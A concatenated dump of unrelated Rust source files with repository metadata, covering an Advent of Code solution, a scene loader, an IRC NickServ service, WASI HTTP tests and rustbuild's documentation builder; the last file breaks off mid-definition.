&ortho_matrix); } //pub fn set_matrix(&mut self, cx: &mut Cx, matrix: &Mat4) { //let pass_id = self.pass_id.expect("Please call set_ortho_matrix after begin_pass"); //let cxpass = &mut cx.passes[pass_id]; // } }
true
d9c45a9c28969970d6038d7b11c434a466c4d12e
Rust
csirkeee/advent2020
/day9a/src/main.rs
UTF-8
831
3.03125
3
[]
no_license
use std::error::Error; use std::io; use std::io::BufRead; fn main() -> Result<(), Box<dyn Error>> { let stdin = io::stdin(); let mut v: Vec<i64> = Vec::new(); for line in stdin.lock().lines() { if let Ok(n) = line?.parse() { let len = v.len(); if len >= 25 { let mut good = false; 'outer: for i in len - 25..len - 1 { for j in i..len { if v[i] != v[j] && v[i] + v[j] == n { good = true; break 'outer; } } } if !good { println!("{}", n); break; } } v.push(n); } } return Ok(()); }
true
6361b62d1f73ddfd9c7e98944c1bc93ef5e0527d
Rust
simonchatts/fsevent-rust
/examples/fsevent-demo.rs
UTF-8
435
2.515625
3
[ "MIT" ]
permissive
extern crate fsevent; use std::sync::mpsc::channel; use std::thread; #[cfg(not(target_os="macos"))] fn main() {} #[cfg(target_os="macos")] fn main() { let (sender, receiver) = channel(); let _t = thread::spawn(move || { let fsevent = fsevent::FsEvent::new(vec![".".to_string()]); fsevent.observe(sender); }); loop { let val = receiver.recv(); println!("{:?}", val.unwrap()); } }
true
b3bf2a73ec747a462420b6d458c1473861fe4814
Rust
ziliang8658/CalaRender
/src/RenderManager.rs
UTF-8
6,291
3.046875
3
[]
no_license
use std::fs::File; use std::io::{self, BufReader, BufRead}; use std::path::Path; mod Geometry; use Geometry::Vec3f; pub struct SceneManager { pub models: Vec<Model>, pub lights: Vec<Light>, } pub struct Model { meshId: i32, materidId: i32, position: Vec3f, rotation: Vec3f, scaling: Vec3f, meshResPath: str, matResPath: str, albedo_map: str, normal_map: str, ambient_ligth: str, roughness_map: str, } pub struct Light { lightType: str, radius: f32, period: u32, position: Vec3f, Color: Vec3f, } impl SceneManager { pub fn loadScene(&self, sceneFile: &str) -> bool { let file = File::open(filename).unwrap(); let reader = BufReader::new(file); for (index, line) in reader.lines().enumerate() { let line = line.unwrap(); // Ignore errors. // Show the line and its number. println!("{}. {}", index + 1, line); } return true; } } fn parseFromFile(file: &File) { let mut reader = BufReader::new(file); let mut buf = String::from(""); let line_index = 0; let mut models: Vec<Model> = Vec::new(); let mut lights: Vec<Model> = Vec::new(); while (reader.read_line(&mut buf) != 0) { if lien_index == 0 { if line == 'm' { //now we read the model data reader.read_line(&mut buf); let model_count = buf.trim().parse().expect("it's not a number"); let mut model_index = 0; while model_index < model_count { parseModelInfo(&mut reader, &mut buf, &mut models) model_index += 1; } } if line == 'l' { reader.read_line(&mut buf); let light_count = buf.trim().parse().expect("it's not a number"); let mut light_index = 0; while light_index < light_count { parseModelInfo(&mut reader, &mut buf, &mut models) model_index += 1; } } } } } fn parseModelInfo(reader: &mut BufReader<&File>, buf: &mut String, models: &mut Vec<Model>, basePath: &str) -> Model { //Firstly, read the meshId and materialId; reader.read_line(buf); let mut split_info = buf.split(" "); if len(split_info) != 2 {} let meshId: i32 = split_info.next().unwrap().parse().unwrap(); let materidId = split_info.next().unwrap().parse().unwrap(); let meshFilePath = basePath + "/meshes/" + meshId + "_mesh.obj"; let materialPath = basePath + "/materials/" + materidId + "/" + materidId; //Then, read the position info; split_info = buf.split(" "); let mut modelInfo: Vec<Vec3f> = Vec::new(); let mut infoIndex = 0; while infoIndex < 3 { reader.read_line(buf); let mut split_info = buf.split(" "); modelInfo.push(Vec3f { x: split_info.next().unwrap().parse().unwrap(), y: split_info.next().unwrap().parse().unwrap(), z: split_info.next().unwrap().parse().unwrap(), }); infoIndex += 1; } loadImageFromMaterial(model, materidId); models.push(Model { meshId, materidId: 0, position: Vec3f { x: modelInfo.get(0).unwrap().x, y: modelInfo.get(0).unwrap().y, z: modelInfo.get(0).unwrap().z, }, rotation: Vec3f { x: modelInfo.get(1).unwrap().x, y: modelInfo.get(1).unwrap().y, z: modelInfo.get(1).unwrap().z, }, scaling: Vec3f { x: modelInfo.get(2).unwrap().x, y: modelInfo.get(2).unwrap().y, z: modelInfo.get(2).unwrap().z, }, } ); //Finally, we only need to read an empty line to finish the model parsing process reader.read_line(buf); } fn parseLightInfo(reader: &mut BufReader<&File>, buf: &mut String, lights: &mut Vec<Light>) -> Model { let mut light = Light { lightType: "" as str, radius: 0.0, period: 0, position: Vec3f::new(0.0, 0.0, 0.0), Color: Vec3f::new(0.0, 0.0, 0.0), }; //Firstly, read the LigthType reader.read_line(buf); let lightType: &str = buf.trim().clone(); let mut key = ""; let mut radius = ""; let mut period = 0; if lightType == "o" || lightType == "l" { let mut infoIndex = 0; reader.read_line(buf); let mut split_info = buf.split(" "); key = split_info.next().unwrap().parse().unwrap(); radius = split_info.next().unwrap().parse().unwrap(); period = split_info.next().unwrap().parse().unwrap(); } let mut infoIndex = 0; while infoIndex < 2 { //Then, read the position and Color Info split_info = buf.split(" "); let mut fieldInfo = 0; reader.read_line(buf); let mut split_info = buf.split(" "); key = split_info.next().unwrap().parse().unwrap(); if infoIndex == 1 { light.position = Vec3f::new( x: split_info.next().unwrap().parse().unwrap(), y: split_info.next().unwrap().parse().unwrap(), z: split_info.next().unwrap().parse().unwrap(), ) } else { light.Color = Vec3f::new( x: split_info.next().unwrap().parse().unwrap(), y: split_info.next().unwrap().parse().unwrap(), z: split_info.next().unwrap().parse().unwrap(), ) } infoIndex += 1 } //Finally, we only need to read an empty line to finish the model parsing process reader.read_line(buf); lights.push(light); } fn loadImageFromMaterial(model: &mut Model, materialPath: &str) { model.albedo_map = materialPath + "_albedo.png"; model.normal_map = materialPath + "_normal.png"; model.ambient_ligth = materialPath + "_ao.png"; model.roughness_map = materialPath + "_rough.png" } fn loadResFromMesh(model: &mut Model, meshFilePath: &str) {}
true
1d8115d738ad11d28d0e2d57233b32e40e032377
Rust
sdleffler/type-level-logic-rs
/src/strong/mod.rs
UTF-8
313
2.65625
3
[ "MIT", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
//! "Strongly" enforced (non-SFINAE-style) type operators. Here, "strong" means that if you use //! a type operator from this module, Rust will complain if it can't guarantee an `impl` for it //! and you haven't listed it as a trait bound in a `where` clause. pub mod boolean; pub mod ternary; pub mod balanced;
true
c37bea4f9610cb231978f27b712ebc8ce0ece744
Rust
NightRoadIx/IntraLenguaje
/parimpar.rs
UTF-8
589
3.796875
4
[]
no_license
use std::io; fn input(user_message: &str) -> io::Result<String> { use std::io::Write; print!("{}", user_message); io::stdout().flush()?; let mut buffer: String = String::new(); io::stdin().read_line(&mut buffer)?; Ok(buffer.trim_right().to_owned()) } fn main() { let num = input("Ingrese un número: ") .unwrap() .parse::<i32>() .expect("Expected a number"); if num % 2 == 0 { println!("`{}` es un número par.", num); } else { println!("`{}` es un número impar", num); } }
true
328480ca73d1bb310fe92cdd841dea478975cf74
Rust
skrapi/ClojureRS
/src/namespace.rs
UTF-8
911
2.90625
3
[]
no_license
use crate::rust_core::{AddFn, StrFn}; use crate::value::ToValue; use crate::value::Value; use crate::Symbol; use std::cell::RefCell; use std::collections::HashMap; use std::rc::Rc; #[derive(Debug, Clone)] pub struct Namespace { pub name: Symbol, mappings: RefCell<HashMap<Symbol, Rc<Value>>>, } impl Namespace { pub fn new(name: Symbol, mappings: RefCell<HashMap<Symbol, Rc<Value>>>) -> Namespace { Namespace { name, mappings } } pub fn insert(&self, sym: Symbol, val: Rc<Value>) { self.mappings.borrow_mut().insert(sym, val); } pub fn get(&self, sym: &Symbol) -> Rc<Value> { match self.mappings.borrow_mut().get(sym) { Some(val) => Rc::clone(val), None => Rc::new(Value::Condition(format!("Undefined symbol {}", sym.name))), } } } #[derive(Debug, Clone)] pub struct Namespaces(pub RefCell<HashMap<Symbol, Namespace>>);
true
a634884cbfa961aaf57619eea61816debc6b7c7d
Rust
bytecodealliance/wasmtime
/crates/test-programs/wasi-http-tests/src/bin/outbound_request_get.rs
UTF-8
1,068
2.53125
3
[ "LLVM-exception", "Apache-2.0" ]
permissive
use anyhow::{Context, Result}; use wasi_http_tests::bindings::wasi::http::types::{Method, Scheme}; struct Component; fn main() {} async fn run() -> Result<(), ()> { let res = wasi_http_tests::request( Method::Get, Scheme::Http, "localhost:3000", "/get?some=arg&goes=here", None, None, ) .await .context("localhost:3000 /get") .unwrap(); println!("localhost:3000 /get: {res:?}"); assert_eq!(res.status, 200); let method = res.header("x-wasmtime-test-method").unwrap(); assert_eq!(std::str::from_utf8(method).unwrap(), "GET"); let uri = res.header("x-wasmtime-test-uri").unwrap(); assert_eq!( std::str::from_utf8(uri).unwrap(), "http://localhost:3000/get?some=arg&goes=here" ); assert_eq!(res.body, b""); Ok(()) } impl wasi_http_tests::bindings::exports::wasi::cli::run::Run for Component { fn run() -> Result<(), ()> { wasi_http_tests::in_tokio(async { run().await }) } } wasi_http_tests::export_command_extended!(Component);
true
a0264408127c08a67439167c69f6c30a4051614a
Rust
EngineersBox/NES-Emulator
/src/cpu/utils.rs
UTF-8
185
2.6875
3
[]
no_license
// Verifies if hex address in a legal range. pub fn check_hex_range(addr: u16) -> bool { return if addr < 0x0000 || addr > 0xFFFF { false } else { true }; }
true
148673a1d4f93b40d8d6ddd769ac210e8bee6093
Rust
gnoliyil/fuchsia
/src/devices/bin/driver_tools/src/subcommands/i2c/subcommands/transact/args.rs
UTF-8
846
2.5625
3
[ "BSD-2-Clause" ]
permissive
// Copyright 2022 The Fuchsia Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. use {argh::FromArgs, std::path::PathBuf}; #[derive(FromArgs, Debug, PartialEq)] #[argh( subcommand, name = "transact", description = "Sends a sequence of I2C transactions to an I2C device in the order they are written", example = "Send transactions to read 100 bytes, then write the bytes 0xab, 0x02, and 0xff; and then read 4 bytes to I2C device 004: $ driver i2cutil transact r 100 w 171 2 255 r 4" )] pub struct TransactCommand { #[argh(positional, description = "path of the I2C device relative to devfs")] pub device_path: PathBuf, #[argh(positional, description = "transactions to send to I2C device")] pub transactions: Vec<String>, }
true
15688589aa3c4acc4477eeb27642d73c399f5af7
Rust
diath/ayame
/src/services/nickserv.rs
UTF-8
4,690
2.90625
3
[]
no_license
use std::collections::HashMap; use async_trait::async_trait; use tokio::sync::Mutex; use crate::client::Client; use crate::service::Service; pub struct NickServ { pub nicks: Mutex<HashMap<String, String>>, } impl NickServ { pub fn new() -> NickServ { NickServ { nicks: Mutex::new(HashMap::new()), } } async fn reply(&self, client: &Client, message: &str) { let nick = client.nick.lock().await; client .send_raw(format!(":NickServ@services NOTICE {} :{}", nick, message)) .await; } } #[async_trait] impl Service for NickServ { async fn on_message(&self, client: &Client, params: Vec<&str>) { if params.len() < 1 { return; } match params[0].to_ascii_lowercase().as_str() { "register" => { if params.len() < 3 { self.reply(client, "Not enough params").await; } else { if self.nicks.lock().await.contains_key(params[1]) { self.reply(client, "Nick already taken").await; } else { let nick = client.nick.lock().await.to_string(); if nick == params[1] { self.nicks .lock() .await .insert(params[1].to_string(), params[2].to_string()); self.reply(client, "Nick successfully registered").await; } else { self.reply(client, "You can only register your current nick") .await; } } } } "identify" => { if params.len() < 3 { self.reply(client, "Not enough params").await; } else if *client.identified.lock().await { self.reply(client, "You are already identified").await; } else if let Some(password) = self.nicks.lock().await.get(params[1]) { if password == params[2] { (*client.identified.lock().await) = true; self.reply(client, "You are now identified for this nick") .await; } else { self.reply(client, "Wrong password").await; } } else { self.reply(client, "Nick not registered").await; } } "logout" => { let identified = *client.identified.lock().await; if identified { (*client.identified.lock().await) = false; self.reply(client, "You are no longer identified").await; } else { self.reply(client, "You are not identified").await; } } "drop" => { if params.len() < 3 { self.reply(client, "Not enough params").await; } else if *client.identified.lock().await { self.reply(client, "You must logout before dropping a nick") .await; } else { let mut password = None; if let Some(_password) = self.nicks.lock().await.get(params[1]) { password = Some(_password.clone()); } if let Some(password) = password { if password == params[2] { self.nicks.lock().await.remove(params[1]); self.reply(client, "The nick registration has been released") .await; } else { self.reply(client, "Wrong password").await; } } else { self.reply(client, "Nick not registered").await; } } } "help" => { self.reply(client, "NickServ commands:").await; self.reply(client, "REGISTER <nick> <password>").await; self.reply(client, "IDENTIFY <nick> <password>").await; self.reply(client, "LOGOUT").await; self.reply(client, "DROP <nick> <password>").await; self.reply(client, "HELP").await; } _ => { self.reply(client, "Unknown command, try HELP").await; } } } }
true
4b940ec0c20860f03678722ddec6eb4cf695f97e
Rust
kotnik/rustful
/examples/handler_storage.rs
UTF-8
2,400
3.34375
3
[ "MIT" ]
permissive
#[macro_use] extern crate rustful; use std::io::{self, Read}; use std::fs::File; use std::path::Path; use std::sync::{Arc, RwLock}; use std::error::Error; use rustful::{Server, Context, Response, Handler, TreeRouter}; use rustful::Method::Get; fn main() { println!("Visit http://localhost:8080 to try this example."); //Read the page before we start let page = Arc::new(read_string("examples/handler_storage/page.html").unwrap()); //The shared counter state let value = Arc::new(RwLock::new(0)); let router = insert_routes!{ TreeRouter::new() => { "/" => Get: Counter{ page: page.clone(), value: value.clone(), operation: None }, "/add" => Get: Counter{ page: page.clone(), value: value.clone(), operation: Some(add) }, "/sub" => Get: Counter{ page: page.clone(), value: value.clone(), operation: Some(sub) } } }; let server_result = Server { host: 8080.into(), handlers: router, content_type: content_type!(Text / Html; Charset = Utf8), ..Server::default() }.run(); match server_result { Ok(_server) => {}, Err(e) => println!("could not start server: {}", e.description()) } } fn add(value: i32) -> i32 { value + 1 } fn sub(value: i32) -> i32 { value - 1 } fn read_string<P: AsRef<Path>>(path: P) -> io::Result<String> { //Read file into a string let mut string = String::new(); File::open(path).and_then(|mut f| f.read_to_string(&mut string)).map(|_| string) } struct Counter { //We are using the handler to preload the page in this exmaple page: Arc<String>, value: Arc<RwLock<i32>>, operation: Option<fn(i32) -> i32> } impl Handler for Counter { fn handle_request(&self, _context: Context, response: Response) { self.operation.map(|op| { //Lock the value for writing and update it let mut value = self.value.write().unwrap(); *value = op(*value); }); //Insert the value into the page and write it to the response let count = self.value.read().unwrap().to_string(); response.into_writer().send(self.page.replace("{}", &count[..])); } }
true
67966d047395ad3d734a7cd4ad144fd28b9a8269
Rust
IThawk/rust-project
/rust-master/src/bootstrap/doc.rs
UTF-8
25,194
2.640625
3
[ "MIT", "LicenseRef-scancode-other-permissive", "Apache-2.0", "BSD-3-Clause", "BSD-2-Clause", "NCSA" ]
permissive
//! Documentation generation for rustbuilder. //! //! This module implements generation for all bits and pieces of documentation //! for the Rust project. This notably includes suites like the rust book, the //! nomicon, rust by example, standalone documentation, etc. //! //! Everything here is basically just a shim around calling either `rustbook` or //! `rustdoc`. use std::collections::HashSet; use std::fs; use std::io; use std::path::{PathBuf, Path}; use crate::Mode; use build_helper::{t, up_to_date}; use crate::util::symlink_dir; use crate::builder::{Builder, Compiler, RunConfig, ShouldRun, Step}; use crate::tool::{self, prepare_tool_cargo, Tool, SourceType}; use crate::compile; use crate::cache::{INTERNER, Interned}; use crate::config::Config; macro_rules! book { ($($name:ident, $path:expr, $book_name:expr;)+) => { $( #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct $name { target: Interned<String>, } impl Step for $name { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path($path).default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure($name { target: run.target, }); } fn run(self, builder: &Builder<'_>) { builder.ensure(RustbookSrc { target: self.target, name: INTERNER.intern_str($book_name), src: doc_src(builder), }) } } )+ } } // NOTE: When adding a book here, make sure to ALSO build the book by // adding a build step in `src/bootstrap/builder.rs`! book!( EditionGuide, "src/doc/edition-guide", "edition-guide"; EmbeddedBook, "src/doc/embedded-book", "embedded-book"; Nomicon, "src/doc/nomicon", "nomicon"; Reference, "src/doc/reference", "reference"; RustByExample, "src/doc/rust-by-example", "rust-by-example"; RustcBook, "src/doc/rustc", "rustc"; RustdocBook, "src/doc/rustdoc", "rustdoc"; ); fn doc_src(builder: &Builder<'_>) -> Interned<PathBuf> { INTERNER.intern_path(builder.src.join("src/doc")) } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct UnstableBook { target: Interned<String>, } impl Step for UnstableBook { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/doc/unstable-book").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(UnstableBook { target: run.target, }); } fn run(self, builder: &Builder<'_>) { builder.ensure(UnstableBookGen { target: self.target, }); builder.ensure(RustbookSrc { target: self.target, name: INTERNER.intern_str("unstable-book"), src: builder.md_doc_out(self.target), }) } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct CargoBook { target: Interned<String>, name: Interned<String>, } impl Step for CargoBook { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/tools/cargo/src/doc/book").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(CargoBook { target: run.target, name: INTERNER.intern_str("cargo"), }); } fn run(self, builder: &Builder<'_>) { let target = self.target; let name = self.name; let src = builder.src.join("src/tools/cargo/src/doc"); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let out = out.join(name); builder.info(&format!("Cargo Book ({}) - {}", target, name)); let _ = fs::remove_dir_all(&out); builder.run(builder.tool_cmd(Tool::Rustbook) .arg("build") .arg(&src) .arg("-d") .arg(out)); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] struct RustbookSrc { target: Interned<String>, name: Interned<String>, src: Interned<PathBuf>, } impl Step for RustbookSrc { type Output = (); fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { run.never() } /// Invoke `rustbook` for `target` for the doc book `name` from the `src` path. /// /// This will not actually generate any documentation if the documentation has /// already been generated. fn run(self, builder: &Builder<'_>) { let target = self.target; let name = self.name; let src = self.src; let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let out = out.join(name); let src = src.join(name); let index = out.join("index.html"); let rustbook = builder.tool_exe(Tool::Rustbook); let mut rustbook_cmd = builder.tool_cmd(Tool::Rustbook); if up_to_date(&src, &index) && up_to_date(&rustbook, &index) { return } builder.info(&format!("Rustbook ({}) - {}", target, name)); let _ = fs::remove_dir_all(&out); builder.run(rustbook_cmd .arg("build") .arg(&src) .arg("-d") .arg(out)); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct TheBook { compiler: Compiler, target: Interned<String>, name: &'static str, } impl Step for TheBook { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/doc/book").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(TheBook { compiler: run.builder.compiler(run.builder.top_stage, run.builder.config.build), target: run.target, name: "book", }); } /// Builds the book and associated stuff. /// /// We need to build: /// /// * Book (first edition) /// * Book (second edition) /// * Version info and CSS /// * Index page /// * Redirect pages fn run(self, builder: &Builder<'_>) { let compiler = self.compiler; let target = self.target; let name = self.name; // build book builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(name.to_string()), src: doc_src(builder), }); // building older edition redirects let source_name = format!("{}/first-edition", name); builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(source_name), src: doc_src(builder), }); let source_name = format!("{}/second-edition", name); builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(source_name), src: doc_src(builder), }); let source_name = format!("{}/2018-edition", name); builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(source_name), src: doc_src(builder), }); // build the version info page and CSS builder.ensure(Standalone { compiler, target, }); // build the redirect pages builder.info(&format!("Documenting book redirect pages ({})", target)); for file in t!(fs::read_dir(builder.src.join("src/doc/book/redirects"))) { let file = t!(file); let path = file.path(); let path = path.to_str().unwrap(); invoke_rustdoc(builder, compiler, target, path); } } } fn invoke_rustdoc( builder: &Builder<'_>, compiler: Compiler, target: Interned<String>, markdown: &str, ) { let out = builder.doc_out(target); let path = builder.src.join("src/doc").join(markdown); let header = builder.src.join("src/doc/redirect.inc"); let footer = builder.src.join("src/doc/footer.inc"); let version_info = out.join("version_info.html"); let mut cmd = builder.rustdoc_cmd(compiler); let out = out.join("book"); cmd.arg("--html-after-content").arg(&footer) .arg("--html-before-content").arg(&version_info) .arg("--html-in-header").arg(&header) .arg("--markdown-no-toc") .arg("--markdown-playground-url").arg("https://play.rust-lang.org/") .arg("-o").arg(&out).arg(&path) .arg("--markdown-css").arg("../rust.css"); builder.run(&mut cmd); } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Standalone { compiler: Compiler, target: Interned<String>, } impl Step for Standalone { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/doc").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Standalone { compiler: run.builder.compiler(run.builder.top_stage, run.builder.config.build), target: run.target, }); } /// Generates all standalone documentation as compiled by the rustdoc in `stage` /// for the `target` into `out`. /// /// This will list all of `src/doc` looking for markdown files and appropriately /// perform transformations like substituting `VERSION`, `SHORT_HASH`, and /// `STAMP` along with providing the various header/footer HTML we've customized. /// /// In the end, this is just a glorified wrapper around rustdoc! fn run(self, builder: &Builder<'_>) { let target = self.target; let compiler = self.compiler; builder.info(&format!("Documenting standalone ({})", target)); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let favicon = builder.src.join("src/doc/favicon.inc"); let footer = builder.src.join("src/doc/footer.inc"); let full_toc = builder.src.join("src/doc/full-toc.inc"); t!(fs::copy(builder.src.join("src/doc/rust.css"), out.join("rust.css"))); let version_input = builder.src.join("src/doc/version_info.html.template"); let version_info = out.join("version_info.html"); if !builder.config.dry_run && !up_to_date(&version_input, &version_info) { let info = t!(fs::read_to_string(&version_input)) .replace("VERSION", &builder.rust_release()) .replace("SHORT_HASH", builder.rust_info.sha_short().unwrap_or("")) .replace("STAMP", builder.rust_info.sha().unwrap_or("")); t!(fs::write(&version_info, &info)); } for file in t!(fs::read_dir(builder.src.join("src/doc"))) { let file = t!(file); let path = file.path(); let filename = path.file_name().unwrap().to_str().unwrap(); if !filename.ends_with(".md") || filename == "README.md" { continue } let html = out.join(filename).with_extension("html"); let rustdoc = builder.rustdoc(compiler); if up_to_date(&path, &html) && up_to_date(&footer, &html) && up_to_date(&favicon, &html) && up_to_date(&full_toc, &html) && (builder.config.dry_run || up_to_date(&version_info, &html)) && (builder.config.dry_run || up_to_date(&rustdoc, &html)) { continue } let mut cmd = builder.rustdoc_cmd(compiler); cmd.arg("--html-after-content").arg(&footer) .arg("--html-before-content").arg(&version_info) .arg("--html-in-header").arg(&favicon) .arg("--markdown-no-toc") .arg("--index-page").arg(&builder.src.join("src/doc/index.md")) .arg("--markdown-playground-url").arg("https://play.rust-lang.org/") .arg("-o").arg(&out) .arg(&path); if filename == "not_found.md" { cmd.arg("--markdown-css") .arg("https://doc.rust-lang.org/rust.css"); } else { cmd.arg("--markdown-css").arg("rust.css"); } builder.run(&mut cmd); } } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Std { pub stage: u32, pub target: Interned<String>, } impl Step for Std { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.all_krates("test").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Std { stage: run.builder.top_stage, target: run.target }); } /// Compile all standard library documentation. /// /// This will generate all documentation for the standard library and its /// dependencies. This is largely just a wrapper around `cargo doc`. fn run(self, builder: &Builder<'_>) { let stage = self.stage; let target = self.target; builder.info(&format!("Documenting stage{} std ({})", stage, target)); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let compiler = builder.compiler_for(stage, builder.config.build, target); builder.ensure(compile::Std { compiler, target }); let out_dir = builder.stage_out(compiler, Mode::Std) .join(target).join("doc"); // Here what we're doing is creating a *symlink* (directory junction on // Windows) to the final output location. This is not done as an // optimization but rather for correctness. We've got three trees of // documentation, one for std, one for test, and one for rustc. It's then // our job to merge them all together. // // Unfortunately rustbuild doesn't know nearly as well how to merge doc // trees as rustdoc does itself, so instead of actually having three // separate trees we just have rustdoc output to the same location across // all of them. // // This way rustdoc generates output directly into the output, and rustdoc // will also directly handle merging. let my_out = builder.crate_doc_out(target); t!(symlink_dir_force(&builder.config, &my_out, &out_dir)); t!(fs::copy(builder.src.join("src/doc/rust.css"), out.join("rust.css"))); let run_cargo_rustdoc_for = |package: &str| { let mut cargo = builder.cargo(compiler, Mode::Std, target, "rustdoc"); compile::std_cargo(builder, &compiler, target, &mut cargo); // Keep a whitelist so we do not build internal stdlib crates, these will be // build by the rustc step later if enabled. cargo.arg("-Z").arg("unstable-options") .arg("-p").arg(package); // Create all crate output directories first to make sure rustdoc uses // relative links. // FIXME: Cargo should probably do this itself. t!(fs::create_dir_all(out_dir.join(package))); cargo.arg("--") .arg("--markdown-css").arg("rust.css") .arg("--markdown-no-toc") .arg("--generate-redirect-pages") .arg("--resource-suffix").arg(crate::channel::CFG_RELEASE_NUM) .arg("--index-page").arg(&builder.src.join("src/doc/index.md")); builder.run(&mut cargo.into()); }; for krate in &["alloc", "core", "std", "proc_macro", "test"] { run_cargo_rustdoc_for(krate); } builder.cp_r(&my_out, &out); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Rustc { stage: u32, target: Interned<String>, } impl Step for Rustc { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.krate("rustc-main").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Rustc { stage: run.builder.top_stage, target: run.target, }); } /// Generates compiler documentation. /// /// This will generate all documentation for compiler and dependencies. /// Compiler documentation is distributed separately, so we make sure /// we do not merge it with the other documentation from std, test and /// proc_macros. This is largely just a wrapper around `cargo doc`. fn run(self, builder: &Builder<'_>) { let stage = self.stage; let target = self.target; builder.info(&format!("Documenting stage{} compiler ({})", stage, target)); // This is the intended out directory for compiler documentation. let out = builder.compiler_doc_out(target); t!(fs::create_dir_all(&out)); // Get the correct compiler for this stage. let compiler = builder.compiler_for(stage, builder.config.build, target); if !builder.config.compiler_docs { builder.info("\tskipping - compiler/librustdoc docs disabled"); return; } // Build rustc. builder.ensure(compile::Rustc { compiler, target }); // We do not symlink to the same shared folder that already contains std library // documentation from previous steps as we do not want to include that. let out_dir = builder.stage_out(compiler, Mode::Rustc).join(target).join("doc"); t!(symlink_dir_force(&builder.config, &out, &out_dir)); // Build cargo command. let mut cargo = builder.cargo(compiler, Mode::Rustc, target, "doc"); cargo.env("RUSTDOCFLAGS", "--document-private-items --passes strip-hidden"); compile::rustc_cargo(builder, &mut cargo); // Only include compiler crates, no dependencies of those, such as `libc`. cargo.arg("--no-deps"); // Find dependencies for top level crates. let mut compiler_crates = HashSet::new(); for root_crate in &["rustc_driver", "rustc_codegen_llvm", "rustc_codegen_ssa"] { let interned_root_crate = INTERNER.intern_str(root_crate); find_compiler_crates(builder, &interned_root_crate, &mut compiler_crates); } for krate in &compiler_crates { // Create all crate output directories first to make sure rustdoc uses // relative links. // FIXME: Cargo should probably do this itself. t!(fs::create_dir_all(out_dir.join(krate))); cargo.arg("-p").arg(krate); } builder.run(&mut cargo.into()); } } fn find_compiler_crates( builder: &Builder<'_>, name: &Interned<String>, crates: &mut HashSet<Interned<String>> ) { // Add current crate. crates.insert(*name); // Look for dependencies. for dep in builder.crates.get(name).unwrap().deps.iter() { if builder.crates.get(dep).unwrap().is_local(builder) { find_compiler_crates(builder, dep, crates); } } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Rustdoc { stage: u32, target: Interned<String>, } impl Step for Rustdoc { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { run.krate("rustdoc-tool") } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Rustdoc { stage: run.builder.top_stage, target: run.target, }); } /// Generates compiler documentation. /// /// This will generate all documentation for compiler and dependencies. /// Compiler documentation is distributed separately, so we make sure /// we do not merge it with the other documentation from std, test and /// proc_macros. This is largely just a wrapper around `cargo doc`. fn run(self, builder: &Builder<'_>) { let stage = self.stage; let target = self.target; builder.info(&format!("Documenting stage{} rustdoc ({})", stage, target)); // This is the intended out directory for compiler documentation. let out = builder.compiler_doc_out(target); t!(fs::create_dir_all(&out)); // Get the correct compiler for this stage. let compiler = builder.compiler_for(stage, builder.config.build, target); if !builder.config.compiler_docs { builder.info("\tskipping - compiler/librustdoc docs disabled"); return; } // Build rustc docs so that we generate relative links. builder.ensure(Rustc { stage, target }); // Build rustdoc. builder.ensure(tool::Rustdoc { compiler: compiler }); // Symlink compiler docs to the output directory of rustdoc documentation. let out_dir = builder.stage_out(compiler, Mode::ToolRustc) .join(target) .join("doc"); t!(fs::create_dir_all(&out_dir)); t!(symlink_dir_force(&builder.config, &out, &out_dir)); // Build cargo command. let mut cargo = prepare_tool_cargo( builder, compiler, Mode::ToolRustc, target, "doc", "src/tools/rustdoc", SourceType::InTree, &[] ); // Only include compiler crates, no dependencies of those, such as `libc`. cargo.arg("--no-deps"); cargo.arg("-p").arg("rustdoc"); cargo.env("RUSTDOCFLAGS", "--document-private-items"); builder.run(&mut cargo.into()); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct ErrorIndex { target: 